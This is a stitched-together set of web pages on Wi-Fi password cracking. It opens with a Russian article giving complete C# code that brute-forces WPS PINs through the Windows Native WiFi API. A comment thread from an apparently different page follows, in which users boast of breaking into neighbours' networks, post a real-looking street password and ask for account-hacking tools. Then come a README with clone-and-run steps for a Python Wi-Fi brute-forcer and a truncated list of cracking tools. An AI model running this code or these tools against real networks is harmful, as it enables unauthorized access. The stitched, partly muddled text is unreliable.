Программа брутфорс для wifi windows

Время на прочтение
7 мин

Количество просмотров 57K

Надежные и постоянно меняющиеся пароли — это здорово. Особенно когда они меняются и на Wi-Fi роутере и WPS на нем вообще отключен. В этом посте: сколько занимает перебор WPS pin и есть ли у этого практическое применение? А еще напишем программу для брутфорса на C#

Дисклеймер: информация представленная в публикации носит сугубо исследовательский характер для рассмотрения модели угрозы «брутфорс» (подбор пароля) с целью оценки защищенности тестового стенда и не является инструкцией к противоправным действиям. Исследование проводилось на тестовом стенде, состоящим из личного оборудования, не подключенного к сети интернет. Ответственность за противоправное использование полученной информации ложится на субъекта воспроизвевшего атаку не в исследовательских целях и против оборудования других субъектов.

Итак

Самый скучный но обязательный блок статьи позади, однако стоит вспомнить и про следующие статьи УК РФ:

1. ст. 272 УК РФ. Неправомерный доступ к компьютерной информации

2. ст. 273 УК РФ. Создание, использование и распространение вредоносных компьютерных программ

3. ст. 138 УК РФ. Нарушение тайны переписки, телефонных переговоров, почтовых, телеграфных или иных сообщений

4. ст. 159.6 УК РФ. Мошенничество в сфере компьютерной информации

Взламывать чужие Wi-Fi роутеры — это очень плохая идея.

Тем не менее, в качестве «proof of concept» попробуем воспроизвести брутфорс атаку на домашний роутер с использованием C#. Атака будет основана на использовании Native WiFi API и xml профилях.

Профили для Wi-Fi, на мой взгляд, заслуживает отдельной статьи и для меня стало большим удивлением, что существует получение профиля, например, прямо с сайта — об этом есть небольшая статья в документации Майкрософт. В кратце это работает так: xml с реквизитами для подключения подтягивается в системные настройки (а если точно, то в UWP приложение Настройки) и во всплывающем окне показывается какую сеть предлагается добавить. Как сказано в самой статье, это может быть использовано для добавления сети заранее, еще до посещения кафе/лаунджа/{you_name_it} где вещает сеть. Подробно элементы xml профиля описаны тут.

Атака будет производиться посредством генерации xml профиля в коде и его передачи в Native WiFi API — далее Windows выполнит попытку подключиться и, если удалось подобрать WPS pin, удачно использованный профиль останется в компьютере, а pin будет выведен на консоль.

Посмотреть уже существующие профили можно двумя способами: вручную и через консоль. Для ручного просмотра нужно зайти в C:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces и выбрать адаптер по его Id — узнать этот Id можно при небольшом дебаге подключаемой библиотеки или перебрав вручную. Для просмотра через консоль потребуются права администратора и пара команд — этот способ более удобен для точечного вытаскивания профиля к нужной сети:

netsh wlan show profile
netsh wlan export profile name="{Insert profile name}" folder=C:\WlanProfiles

Чтобы не ошибиться со значениями и полями в xml профиле, можно сперва попытаться подключиться к атакуемой Wi-Fi сети с заведомо неправильным паролем — так Windows создаст xml файл за вас и далее останется лишь динамически подставлять пароли.

В примере xml профиль будет храниться в виде строки в коде и это не самый лучший подход к формированию xml, но его вполне хватит чтобы поиграться с попытками подключится к сети. На самом деле на сайте документации Майкрософт есть xsd схема по которой создаются xml профили, но почему-то в ней отсутствует секция «sharedKey», поэтому я решил хранить xml профиль просто строкой в коде как это описано на Stackoverflow. В целом для более «промышленного» решения можно сгенерировать классы через xsd.exe, но в конкретно этом случае придется сверяться с xml профилем атакуемой сети для поиска всех недостающих полей, так как вполне возможно что опубликованная xsd схема просто устарела.

С подобной атакой должен справиться любой Wi-Fi адаптер, но подбор пароля без стратегии и без параллелизации на несколько адаптеров займет много времени. Так перебор WPS pin одним адаптером и попыткой раз в 2 секунды может занять до 6.3 года или же до 2315 дней. Уместно будет вспомнить цитату, что «9 женщин не родят ребенка за месяц», ведь использование 9 адаптеров сократит подбор пароля до 257 дней — почти 9 месяцев

Шаг 1 — Подготовка решения

Для начала склониуйте проект ManagedWiFi — это обертка для доступа к сборке wlanapi.dll, которая даст доступ к Native WiFi API — последняя дает возможность просматривать состояние Wi-Fi адаптеров, сетей, и добавлять профили для подключения, что и будет использовано для воспроизведения атаки.

Здесь я отмечу, что в NuGet есть пакет ManagedWiFi, но во время подключения к Wi-Fi выпадало исключение — у меня это решилось ссылкой на скаченный проект, но может быть пакет заработает у вас с первого раза.

Далее создайте проект с консольным приложением и сделайте ссылку на проект ManagedWifi из скачанного репозитория либо добавьте одноименный пакет NuGet. Этот этап можно считать успешным, если получилось создать объект WlanClient, увидеть список адаптеров и вывести список доступных сетей:

WlanClient client = new ();
foreach (WlanClient.WlanInterface wlan in client.Interfaces)
{
  	wlan.Scan();
  	Wlan.WlanAvailableNetwork[] networks = wlan.GetAvailableNetworkList(0);
  	foreach (Wlan.WlanAvailableNetwork network in networks)
    {
      	string ssid = Encoding.Default.GetString(network.dot11Ssid.SSID);
      	Console.WriteLine(ssid);
    }
}

Шаг 2 — профиль для Wi-Fi

Профиль будет собираться из трех составляющих: название профиля, hex значение названия SSID и WPS pin c которым будет выполняться попытка подключения, а все остальные поля возьмем из xml профиля с которым ранее пытались подключиться к аналогичной сети. Для теста попробуем подключиться к сети с защитой WPA2PSK/AES, которую нашли выше:

string key = "00000001"; // А еще сюда можно вписать заранее (не)известный пароль
string profileName = Encoding.Default.GetString(network.dot11Ssid.SSID);
byte[] hexBytes = Encoding.Default.GetBytes(profileName);
string hex = BitConverter.ToString(hexBytes).Replace("-", "");

string profileXml = string.Format(
                "<?xml version=\"1.0\"?><WLANProfile xmlns=\"http://www.microsoft.com/networking/WLAN/profile/v1\"><name>{0}</name><SSIDConfig><SSID><hex>{1}</hex><name>{0}</name></SSID></SSIDConfig><connectionType>ESS</connectionType><connectionMode>manual</connectionMode><autoSwitch>false</autoSwitch><MSM><security><authEncryption><authentication>WPA2PSK</authentication><encryption>AES</encryption><useOneX>false</useOneX></authEncryption><sharedKey><keyType>passPhrase</keyType><protected>false</protected><keyMaterial>{2}</keyMaterial></sharedKey><keyIndex>0</keyIndex></security></MSM></WLANProfile>",
                profileName, hex, key);

Как было сказано в самом начале, на каждую попытку будет создаваться такой xml профиль, а уже существующий профиль для атакуемой сети будет перезаписываться. Далее при вызове метода Connect, будет передаваться имя профиля по которому нужно выполнить соединение:

try
{
  wlan.SetProfile(Wlan.WlanProfileFlags.AllUser, profileXml, true);
  wlan.Connect(Wlan.WlanConnectionMode.Profile, Wlan.Dot11BssType.Any, profileName);
  await Task.Delay(2 * 1000);
}
catch (Exception e)
{
  Console.WriteLine(e);
}

Шаг 3

Соберем все что получилось в одном месте и попробуем запустить:

using System.Text;
using NativeWifi;

// Берем первый попавшийся Wi-Fi адаптер
WlanClient client = new ();
WlanClient.WlanInterface wlan = client.Interfaces[0];
wlan.Scan();
Wlan.WlanAvailableNetwork[] networks = wlan.GetAvailableNetworkList(0);
if (networks.Length == 0)
{
  OutputExtensions.PrintRow("No networks found");
  return;
}

// Отбираем сеть по её названию
Wlan.WlanAvailableNetwork network = networks
        .FirstOrDefault(n => Encoding.Default.GetString(n.dot11Ssid.SSID) == "desired_network_name");

// Подготавливаем данные для создания профиля
string profileName = Encoding.Default.GetString(network.dot11Ssid.SSID);
byte[] hexBytes = Encoding.Default.GetBytes(profileName);
string hex = BitConverter.ToString(hexBytes).Replace("-", "");

// Перебираем значения WPS pin - максимум 8 цифр.
// Также же тут можно сделать перебор по словарю утекших паролей
for (int i = 0; i < 99999999; i++)
{
  string wpsPin = $"{i}";
  wpsPin = new string('0', 8 - wpsPin.Length) + wpsPin;
  Console.WriteLine($"Trying pin {wpsPin}");
	
  string profileXml = string.Format(
    "<?xml version=\"1.0\"?><WLANProfile xmlns=\"http://www.microsoft.com/networking/WLAN/profile/v1\"><name>{0}</name><SSIDConfig><SSID><hex>{1}</hex><name>{0}</name></SSID></SSIDConfig><connectionType>ESS</connectionType><connectionMode>manual</connectionMode><autoSwitch>false</autoSwitch><MSM><security><authEncryption><authentication>WPA2PSK</authentication><encryption>AES</encryption><useOneX>false</useOneX></authEncryption><sharedKey><keyType>passPhrase</keyType><protected>false</protected><keyMaterial>{2}</keyMaterial></sharedKey><keyIndex>0</keyIndex></security></MSM></WLANProfile>",
    profileName, hex, wpsPin);

  try
  {
    wlan.SetProfile(Wlan.WlanProfileFlags.AllUser, profileXml, true);
    wlan.Connect(Wlan.WlanConnectionMode.Profile, Wlan.Dot11BssType.Any, profileName);
    // Тут задается время ожидания для попытки
    // В моей конфигурации это 2 секунды, но
    // время придется подбирать вручную
    await Task.Delay(2 * 1000);
  }
  catch (Exception e)
  {
    Console.WriteLine(e);
  }

  if (wlan.CurrentConnection.isState == Wlan.WlanInterfaceState.Connected)
  {
    Console.WriteLine($"WPS pin is {wpsPin}");
    break;
  }

  Console.WriteLine($"WPS pin {wpsPin} did not work");
}

Вместо заключения

Как оказалось, написать программу для подбора WPS pin на C# можно, а кроме просто перебора цифр при небольших доработках можно даже перебрать пароли из файла.

Практического смысла в этой программе крайне мало, но как минимум что-то можно переиспользовать для обновления Wi-Fi профилей в корпоративных ноутбуках либо провести другой вид атаки и, например, заставить нужное устройство подключиться к «правильной» сети.

В свободном доступе давно существует aircrack-ng и при минимальных знаниях можно в разумное время подобрать пароль к сети просто следуя гайду. И помните: взламывать чужие Wi-Fi роутеры — это очень плохая идея.

1. 

   КПД у программы процентов на 50. Но в принципе этого хватает. Особенно когда речь идёт о пассивном подборе.

   • 

   • 

     а какой код когда я разархивирую то надо какойта пароль

   • 

   • 

     скачал,есть проблемы,не находит pass.txt,что делать???как быть?пробывал свою сеть взломать не рубит

   • 

     файл pass.txt это ваш словарь

2. 

   • 

   • 

     народ скиньте на норм словари пж)

   • 

     Ага, всё в гуды сливает, «сбрутил» 13 точек, но у каждой пароль или qwertyui или fuckyou, короче кал

   • 

     Oncy: кал это твой мозг, всё робит)

   • 

     работает я взломал уже много вайфаев

3. 

4. 

   к сожалению не одну сеть не смог взломать. может архив маленький, и на последних минутах выдает ошибку. а так программка хорошо задумана

5. 

   народ дайте ссыль на норм словари пж)

   • 

   • 

6. 

   нормальная прога взломал соседскую сеть без всякой хакерской пурги и лишних движений

   • 

   • 

   • 

     не получается архивировать файл, ошибку выдаёт

7. 

   пролистал вашу работу, спасибо за проги!!!

8. 

   скажите пожалуйста почему иногда пишу пароль ‘www.spy-soft.net’ показывает неверный пароль

   • 

     Легче всего копировать и вставлять. Я и сам не раз ошибался неправильно набрав пароль. Пока не перешёл на последний Winrar, там есть возможность запоминать пароль и быстро его вызывать из выпадающей строки. Очень удобно если часто качаешь с сайтов где архивы запаролены.

9. 

10. 

    где посмотреть найденный пароль? пишет GOOD…

11. 

    Открыл Good.txt там пароль,скопировал его в графу для ввода пароля при подключении к точке,пишет несовпадение пароля… Прога не на 100% подбирает пароли? сканировал своим словарём на 1000000 слов…

    • 

      не находит гуд только бад 1

12. 

    При запуске в Вин7 (64-бит) выдает ошибку? Запуск от имени администратора не помогает. ВТФ?

    • 

      нужен wicrack for win7 Help me !!!

13. 

    архив запороленый, зачем писать что он бесплатный?

    • 

      пароль написан под программой.. Или слепые?

14. 

    Ломать пароль от rar посетитель данного сайта уж точно должен уметь

15. 

    Такой программой лет 200 пароль будет перебирать. Закинул в словарь пароль от точки — пропустил и не подобрал…

    Итог ФУФЛО!

16. 

    Скажите плиз пароль от архива,просто нигде не нашёл

17. 

    на 70% сетей пишет один и тот же пароль qwertyui, который никуда не подходит….

18. 

    Прога рабочая!Изменял свою базу пасов ставил(расширял) !пароли подбирает долговато!но подобрать легкий пароль с цифровым паролем сможет!но один минус это -время!

19. 

    Нормальная прога мой вайфай взломала. Теперь ещё бы взломать соседский wifi ))

    • 

20. 

    Прога хрень полнейшая, с дефолтного словаря на 6 точек в округе, 6 гудов и не один не работает, при том, что от одной точки в словаре был 100% верный пароль , она его пропустила и написала неверный. Зато трек порадовал, автор, пили еще.

21. 

    как закинуть в нее коды??!

22. 

    Огромное спасибо, всё работает. Нашло пароль буквально за пару минут.

23. 

    КУДА ОН ЗАКИДЫВАЕТ ПОРОЛИ УЖЕ ВЕСЬ КОМП ПЕРЕШАРИЛ

24. 

    пароль не подходит, не могу разархивировать все делал по инструкций ?

25. 

26. 

    Спасибо ребята! Вы супер!

27. 

    АУ ПОДСКАЖИТЕ КУДА ЗАКИДЫВАЕТ ПАРЛИ

28. 

    пароль нашло от мое же сети, минимальная скорость подбора 0.5 сек-1 пароль.

29. 

    Спасибо за коменты)) поржал

30. 

    Прога пока лажовая. Просканил 8 сетей, показала GOOD в 6 из их. Ну понятно, что ни один пароль не верный. Потом выбрал сеть, пароль от которой заранее знал и положил в словарь — прога нашла написала что GOOD, при этом показывая совершенно другой пароль, который однозначно не подходит.
    Пока юзать эту прогу бессмысленно, возможно автор ее доработает и получится что-то полезное

31. 

    Выловил один гуд соседского вайфая. Спасибо!

32. 

    Можно ли запустить его на планшете андроид 4.0.4 ?

    • 

33. 

    пачему у меня при открытии приложения установки у меня просят пароль

34. 

    с вайфай разобрался а как взломать блютуз? есть такая же лёгкая программа?

35. 

    Не могу разархивировать, запрашивает пароль.
    Почему автор не может его дать, хотя знает об этом.

    Сколько мусора в интернете…..ужас.

    Всем кто не хочет тратить свои нервы и время, советую ###### на официальном сайте.
    Всё работает и программа более функциональна.
    Советую.

36. 

    О простите за предыдущее гневное письмо.
    Не заметил пароля на архив, прошу прощения.
    Читал не внимательно.
    Будим пробовать.

37. 

    какой пароль вводить скажите пожалуйста

38. 

    Ни на одной из доступных ТД не установлен пароль из словаря, получается подбор пароля в 80% просто пустая трата времени, а словрь из 1000паролей он будет сутками подбирать

39. 

    Скажите, пожалуйста, куда прикрутить словари с паролями?

40. 

    как добавить новый словарь с паролями?

    • 

      Туда, где находится файл WifiCrack.exe, то есть, в папку, в которую распакован архив.

41. 

42. 

    как открыть рар файл ? пороль хочет

43. 

    получилось пороль .. password -www.spy-soft.net

44. 

    Всё робит взломал возле себя 3 сети

45. 

    А где можна скачать словарь только на цифры???

46. 

    А у меня при распаковке архива выдаёт ошибку и распаковываются не все файлы

    • 

      ошибку не пишет,звук пибим)))) но файла Запустить bootinst.bat почему то нет. у тя получилось че нить!?

47. 

    побольше словарей с номерами, а то многие свои номера телефонов ставят(

48. 

    У меня нашел одну ! Написано GOOD — 1 ! Но в папке GOOD нет ни чего (( что делать где пароль который нашел прога ????

49. 

    у меня почему то нет папки Запустить bootinst.bat

50. 

    что делать ? я уже задолбался искать способ по проще, хакнуть хороший сигнал. ничего не выходит я в отчаянье ( хэлп дауну плз) можете поржать,только помогите!

    • 

51. 

    всем привет друзья ,,,,,подскажите как работать этой программой ,вот уже неделя чейто вайвай ловит ,,на пароле стоит ,, скачал прогу полько не смог разобраться ,,помогите пожалуйста

52. 

53. 

    хорошая прога, есть прога взлом одноклассников? (без региза и смс) дайте ссылку плиз,

54. 

55. 

    где пароль не могу в архиве найти

56. 

    не могу скачать программу

57. 

    скачал фаил но он почему та как видио что делать

58. 

    почему программа не может найти словарь и что мне надо делать

59. 

    REBYATA VSE RABOTAET, LICHNO PROVERYAL (VZLOMAL SVOI WI FI), U KOGO NE RABOTAET, DOBAV’TE SLOVAR’ PAROLEI DLYA VZLOMA, VSEM UDACHI!!!

60. 

    Есть сильный сигнал, забрутил его, выдал правильный пароль qwerty1 (7 цифр), сами понимаете такого быть не может, что делать?

61. 

    люди помогите пожалуйста где можно скачать рабочую програмку для взлома одноклассников ооочень нужно прошу!

62. 

    Не открывается. Пишет «не удалось открыть программу»

63. 

    у меня архив скачался ))открыл а там всё запаролено что делать и каким архивом открыть))этим не распаковывается)

    • 

      Я проверил. Архив не битый, стандартный пароль для нашего сайта!

64. 

    Windows 8.0/8.1 don’t working!

65. 

    Подскажите пожалуйста, wicrack работает и сканирует но не выдаёт пароль. Что делать?

    • 

66. 

    чем пороль открить?в место слова получяю вопросительные знаки???

67. 

    privet.cto za kod win rar

68. 

    ‘www.spy-soft.net’ вед ето и есть пароль на архив..

69. 

    почему у меня не подходит параль

70. 

    спасибо огромное я вас люблю админы но вот как потом пароль найти

71. 

    Работает!! Спасибо за прогу

72. 

    Почему у меня пароль открывается только в Good, а в других пишет «Неправильный пароль»?

73. 

    я тут спецом зарегился бля чтоб задать один вопрос -КУДА ПАРОЛИ СОХРАНЯЕТ??????????????????????????????????????????????????????7

74. 

    ребята, срочно нужен ответ???
    очень срочно!
    пожалуйста)

75. 

    Добрый день)

    Подскажите пожалуйста кто-нибудь…или пользователи или модератора или админы куда сохраняются пароли???

    спасибо.

    • 

76. 

    Ленко, спасибо)

    а если там нет ничего — значит не нашло? потому что пишет, что есть в GOOD,а захожу в папку — а там пусто..

77. 

    Перепись кулхацкеров! Люди!! Зачем вам ломать wifi, если вы даже не можете пароль от архива с программой найти, да куда программа логи сохраняет! Забейте! возьме планшетик, поиграйте в танчики, пукните в вечность во вконтактике, запостите фоточку еды в инстаграмме в конце-то концов.

    • 

      шибко умный, я смотрю?
      если нечего делать, иди поработай или книгу прочитай — полезнее будет!

78. 

    подскажите где взять словари и куда их закинуть?
    может кто знает какие чаще всего слова употребляются в паролях и какие словари толковее будет использовать, чтоб не тратить зря время?

79. 

80. 

    Хорошо работает очень классный сижу и лазию через Wi-Fi
    Подобрал пароль одно соседа varia
    Если кто живёт в Волгограде на улице 64-армии то вот пароль 77777777

81. 

    спасибо программе, из 5 точек доступа нашла 4 пароля, но подошел только один. а мне и этого достаточно!!!
    единственное, не могу найти словари… в штатном словаре всего 271 вариант.

82. 

    у меня на win 7 64 не устанавливается!!!

83. 

    Народ! Кто-то знает пароль на 4 хлебзаводе?

84. 

    При открытии проги пишет ошибку «Необрабатываемое исключение в приложении» не ищет сеть, что делать кто знает?

85. 

    подскажите пжлст,написано GOOD-1,но там пусто. как быть,че делать???

86. 

    • 

      Пароль: ‘www.spy-soft.net’

87. 

    wifi crack этот программа работайет windows 8.01

88. 

    неработает,на своей сети проверял

89. 

    а где пороли к программе брать

90. 

    запустил программу, но она очень медленно работает, кто знает как можно её перезапустить , чтобы она подбирала пароли с места остановки, а то так чтобы проверить все 1394000 вариантов надо целый месяц комп не выключать

    • 

      Словарь сделай поменьше, оставь только самое необходимое.

91. 

    Почему программа не работает ?

    • 

      ЗАПУСКАЙТЕ ПРОГУ ИЗ ПАПКИ WifiCrack

92. 

93. 

    ПРограмма у меня просто не запускается по Windows 7

94. 

    Работает!!! только одна из папки исходники\wifi_cracker\bin\release\wifi_cracker.exe проверил несколько раз прога ни разу не ошиблась

    • 

      Да чувак, респект тебе, по указанному тобой пути — все заработало! прога нашла подкинутый мною пароль от моей тестовой вафли в pass.txt. вывалила окно-пароль найден и тормознула на нем,он будет красным шрифтом)
      Так что на виндовозе 7 32 все пашет,теперь будем пополнять базу до отказу)

95. 

    забыл написать что проверил на windows 8.1 х64 и на windows 7 x86 прекрасно работает

96. 

    кстате если база паролей есть у кого, выложите на файлообменник или ссылку на ресурс дайте в коментариях

97. 

    Где найти пароль от архива???

98. 

    Где скачать новую версию wificrack?

99. 

    Это единственная версия. Новее или старее не существует! Не советую качать в друом месте. стопудово с винлокерами будет!!!

100. 

     Работает через раз ) Знаю пароли от 3 сетей. добавил их в словарь и из 3х сетей только 1 пароль нашел )

101. 

     Здравствуйте! Я разработчик ПО и думаю занятся дальнейшей разработкой этой проги.

102. 

     ZyXEL Keenetic Lite не находит заранее вложенный пароль в pass.txt

103. 

     почему найденый пароль зашифрован?

104. 

105. 

     Люди подскажите плиз другую прогу для брутфорса ключей, эта не работает даже с нужным паролем в словаре, win7 32

106. 

     У меня зашифрован скачанный файл что делать

     • 

     • 

       перекачай файл заново, распаковывается нормально!

107. 

108. 

     Я ПОЛЬЗУЮСЬ ПРОГРАММОЙ AIRSLAX КУПИЛ ЕЁ ЗА 1500 И НЕ ЖАЛЕЮ РЕАЛЬНО ПОДБИРАЕТ ПАРОЛЬ ОСОБЕННО WPS. ХОРОШИЕ ПРОГИ ТОЛЬКО ПЛАТНЫЕ.

109. 

     А под linux именно такой способ подбора есть?

110. 

     good)))) всё работает респект вам братья!)))

111. 

     не могу открыть программу…. пишет ошибка контрольной суммы в зашифрованном файле…. помогите кто знает….

112. 

113. 

     У меня тут сто сетей и не к одной не подобрал пароль, словарь который идет совсем маленький, подбирает долго, так может сто лет перебирать варианты

114. 

     знаю точно, что пароль цифровой у искомой сети! Как настроить программу, чтобы перебирала только цифры? В принципе это для брута несложно!

115. 

     странно работает сайт ваш, нету даже дат опубликования вопросов! почему это нужно скрывать?

116. 

     А я вообще не могу запустить прогу. Пишет (Прекращена работа программы ) Что там надо сделать подробнее опишите.

     • 

       Наверно антивирус мешает.

117. 

     пожалуйста, скажите где словари?

     • 

118. 

     СПС!!! Прога старая но до сих пор работает!

119. 

120. 

121. 

     И я НЕ могУ чё за сайт вообще

122. 

     Не качайте, куча вирусов там!

     • 

123. 

     Расскажите как использовать пж

124. 

     • 

125. 

     Комментарии реальные или фейковые? Если отправится, то вроде реальные…

     • 

       Фейковые. Не качай! В архиве вирусы, паразиты и бактерии!

126. 

     Прога работает отлично. Олег подсказал откуда ее запускать……. Работает!!! только одна из папки исходники\wifi_cracker\bin\release\wifi_cracker.exe проверял …. и ни разу не ошиблась
     Олег….ТЫ МОЛОДЕЦ!
     Теперь надо только пополнять и пополнять словарь…

127. 

     А еще прочитайте комментарий пользователя anonymus_63. Он поможет вам проверить утверждение Олега!

Wifi Bruteforce (version 2.0)

• Wifi Bruteforce (version 2.0)
  • Introduction
  • What’s New
  • Python Installation
    • Windows
    • macOS
    • Linux
      • Ubuntu and Debian
      • Fedora
      • CentOS
  • Installation
    • 1.0
      • Install
      • How to use?
      • Wifi bruteforce menu (Password generator)
    • 2.0
      • Windows
  • Contact

Introduction

This is a program for Wifi password brute-forcing that allows you to test the security of your network and assess the strength of your passwords. Version 2.0 comes with significant improvements compared to the previous version, including bug fixes, a complete program redesign, and the addition of a user interface.

What’s New

Version	Improvements
1.0	Slightly accelerated the cracking process
2.0	Fixed numerous bugs, completely redesigned the program, added a user interface (in console), significantly accelerated the cracking process using threads, making a program for many OS (including Windows, MacOS, Linux, etc.)

Python Installation

The Wifi Bruteforce program is written in Python, so you will need to install Python if you don’t have it already. Here’s a step-by-step guide to installing Python on different operating systems:

Windows

1. Go to the official Python website: https://www.python.org/downloads/windows/.
2. Download the Python installer that matches your operating system version (32-bit or 64-bit).
3. Run the downloaded installer.
4. Make sure to check the «Add Python to PATH» option.
5. Click the «Install Now» button and follow the on-screen instructions.
6. Once the installation is complete, Python will be successfully installed on your computer.

macOS

1. Go to the official Python website: https://www.python.org/downloads/mac-osx/.
2. Download the Python installer for macOS.
3. Run the downloaded installer.
4. During the installation, make sure to check the «Install launcher for all users» and «Add Python to PATH» options.
5. Click the «Install Now» button and follow the on-screen instructions.
6. Once the installation is complete, Python will be successfully installed on your computer.

Linux

Python is usually pre-installed on most Linux distributions. If you don’t have it, you can install it through your package manager. Here are some examples of commands to install Python on popular distributions:

Ubuntu and Debian

sudo apt update
sudo apt install python3

Fedora

CentOS

Installation

1. Download the Wifi Bruteforce program from the Releases section of this repository. (recommended last, 2.0), if you using windows, you can download the 1.0 version but 1.0 works only on Windows
2. Extract the zip file with program and use the menu in top to navigate the guide

1.0

Requirements:

Python 3 install from this site
Module pywifi (using pip install pywifi in terminal)
Module tkinter (using pip install tkinter in terminal)

---

Install

1. Launch the setup.exe file and choose the language
2. After selecting the language and continuing, the following window should appear:
   
   If such a window appears as in the photo above, then you must confirm the terms of the license and continue
3. After clicking the «continue» button, you must specify the path where to save
   
4. Select start menu folder (or you can use deafult name)
   
5. You must check the «create a desktop shortcut» box, because if you do not check it, you will have to look for the program in the folder where you installed it, if you have checked it, then a shortcut to the program will appear on your desktop. Do as in the photo
   
6. Check if everything you specified is correct
   
7. Final step: Click «install» and wait until the program is installed

---

How to use?

After installation, a shortcut will appear on the desktop such as in the photo below:

1. Launch the program by double-clicking on the program’s shortcut
   After starting the program, the following window will appear:
   

---

Wifi bruteforce menu (Password generator)

Click button «Password generator» and wait for the generator to start, if the program has started, the following window should appear:

Input how many passwords generate and click Enter
Then password lenght and click Enter
Wait for end of henerating and click Enter
Paswwords that you generate stored in file «passwords.txt»

---

Wifi bruteforce menu
If you want to hack the WIFI you can use the «Wifi bruteforce»
Before we can start read this license:

---

!!!WARNING!!!

PLEASE READ THIS!!!

A brute-force attack is a trial-and-error method used by
application
programs to decode login information and encryption keys to use them to gain 
unauthorized access to systems. 
Using brute force is an exhaustive effort rather than employing intellectual strategies.

Just as a criminal might break into and crack a safe by trying many 
possible combinations, a brute-force attack of applications tries all 
possible combinations of legal characters in a sequence. 
Cybercriminals typically use a brute-force attack to obtain 
access to a website, account or network. 
They may then install malware, shut down web applications or conduct data breaches.

PLEASE USE THIS PROGRAM ONLY FOR GOOD!

---

After reading launch the Wifi brutforce menu and start the wifi bruteforce program
If you don’t install requirements the window will closed
Or if you install all, this window should appear:

On this photo you can see targets with numbers, strenght and SSID of wifi
You must choose the target (input only № of Wifi)
Confirm, and click Enter
Then we must input the filename of our textfile with passwords
To use deafult lib that was downloaded with program input «Cracklib.txt» (with format!)
Click Enter and wait
If password is true the program closed and connect you to the Wifi
How to crack Wifi using the generated passwords?
Generated passwords stored in file «passwords.txt»
Input «passwords.txt» instead of «Cracklib.txt»

2.0

Windows

Open cmd and check that you install the git

If you get an error install git with this link

After installing git write in cmd

git clone https://github.com/DenTs123/Wifi-bruteforce/
cd Wifi-bruteforce/Versions/2.0/Windows
python main.py

After this you can see the Wifi bruteforce menu

Watch the tutorial how to brute the wifi

To use generator type «2» in menu and input values that program are want
Watch authors: type 3 in menu

Contact

The author of the Wifi Bruteforce program is @Opasniy_chel. If you have any questions or suggestions for improving the program, feel free to contact the author.

---

Important: Wifi password cracking is illegal and violates privacy and property rights. Please use this program only for testing your own network security or with the permission of the network owner.

Технология Wi-Fi разрабатывалась, как безопасная сеть, с доступом по паролю. Но со временем находились уязвимости в самом протоколе и в его реализациях, из-за чего сеть становились небезопасной.

В наше время беспроводные сети используются буквально повсюду. Это быстро, удобно, надёжно, не требует размещать множество кабелей по дому и даёт свободу передвижения при использовании устройства.

Поэтому естественно, выпускались новые версии протокола, закрывающие старые проблемы. Так, сначала появился алгоритм шифрования WEP, затем WPA и WPA2. Последний является самым надёжным на данный момент.

За время существования этого типа беспроводной связи было создано множество инструментов для тестирования безопасности Wi-Fi и взлома. Если вы хотите быть уверенными, что ваша сеть в безопасности, вам лучше знать, чем могут пользоваться злоумышленники для атаки на неё.

Мы уже писали ранее про такие инструменты.

9 лучших инструментов для тестирования беспроводного проникновения на Linux

В этой статье мы решили собрать самые популярные программы для взлома Wi Fi.

1. Aircrack
2. AirSnort
3. Kismet
4. Fern Wi-Fi Wireless Cracker
5. CoWPAtty
6. Airjack
7. WepAttack
8. Wifiphisher
9. Reaver
10. Wifite
11. WepDecrypt
12. Pyrit
13. Infernal Twin
14. Pixiewps
15. Crunch
16. Airgeddon

Ну что, начнем.

1. Aircrack-ng

Aircrack одна из самых лучших программ для взлома WiFi, и самый популярный инструмент для тестирования безопасности беспроводных сетей. По сути, это набор инструментов, которые могут практически всё, но работают только из командной строки. Каждый инструмент из набора выполняет чётко одну свою функцию. Вот основные из них: поиск доступных сетей и просмотр подробной информации о них (airodump), захват сетевых пакетов и их фильтрация (airodump), настройка сетевого интерфейса для работы в режиме монитора (airmon), отправка пакетов в сеть (aireplay), перебор паролей с помощью алгоритмов или словаря (aircrack), расшифровка трафика (airdecap).

Принцип действия довольно прост: сначала злоумышленник должен переключить карту в режим монитора, затем найти вашу сеть и начать собирать из неё пакеты или другие данные. Как только он получит то, что ему нужно, перейдёт к перебору пароля. В случае c WEP будет достаточно только большого количества пакетов и пароль будет найден с вероятностью 100%. Для WPA нужно перехватить рукопожатие, которое передаётся в момент, когда вы подключаетесь к Сети. А дальше его можно перебирать по словарю. Чем проще пароль, тем быстрее он будет вычислен.

2. AirSnort

AirSnort — это ещё одна популярная утилита для получения пароля от Wi-Fi-сети. Только работает она лишь с WEP-сетями. Пароль перебирается с помощью специальных алгоритмов. Программа мониторит все передаваемые в сети данные и, когда перехватит достаточное количество пакетов, расшифровывает из них пароль. Очень проста в использовании.

3. Kismet

Kismet — программа другого типа. Это анализатор беспроводных сетей Wi-Fi 802.11a/b/g/n и система обнаружения вторжений. Очень часто этот инструмент используется для решения проблем с сетями Wi-Fi. Kismet отлично работает со всеми Wi-Fi-картами, которые поддерживают режим монитора. Программа позволяет перехватывать пакеты разных протоколов: a/b/g/n, а также обнаруживать скрытые сети. Если к компьютеру подключён GPS, то программа может сохранять место, где была найдена сеть, на карту.

4. Fern Wi-Fi Wireless Cracker

Ещё один неплохой инструмент, который поможет улучшить безопасность беспроводных сетей. Он позволяет просматривать передаваемые пакеты в реальном времени, а также обнаруживать устройства, подключённые к сети. Программа была разработана для выявления недостатков в протоколах сетей и их устранения.

Программа может восстанавливать ключи WEP/WPA так же, как это делает Aircrack, а также ключи WPS методом перебора. Может использоваться для тестирования сетей Ethernet. Для взлома ключей WPA/WPA2 используется перебор по словарю, а для WEP доступны такие алгоритмы: Chop-Chop, Caffe-Latte, Hirte, ARP Request Replay. Инструмент активно разрабатывается и постоянно получает новые функции.

5. CoWPAtty

CoWPAtty — программа для взлома Wi Fi на ПК методом перебора паролей WPA/WPA2 с использованием радужных таблиц. Это вариант атаки по словарю, который работает немного быстрее обычного перебора. Утилита не умеет перехватывать рукопожатия. Ей нужно передать уже перехваченные пакеты. Работает всё в интерфейсе командной строки. Если пароль есть в списке, то программа его найдет. Но скорость работы программы очень сильно зависит от сложности паролей и их количества.

Для обозначения имени SSID используется SHA1, а это означает, что для разных точек доступа придётся создавать новую радужную таблицу. В свежих версиях разработчики попытались увеличить скорость с помощью использования файла хэшей, который содержит 172000 записей и более 1000 самых популярных SSID.

6. AirJack

Airjack выполняет функции, схожие с aireplay. Это утилита для отправки пакетов в беспроводную сеть. Она может использоваться для выполнения атак отказа в обслуживании и MITM атак. Это может быть полезно при создании фейковой точки доступа, когда вам нужно заглушить основную.

7. WepAttack

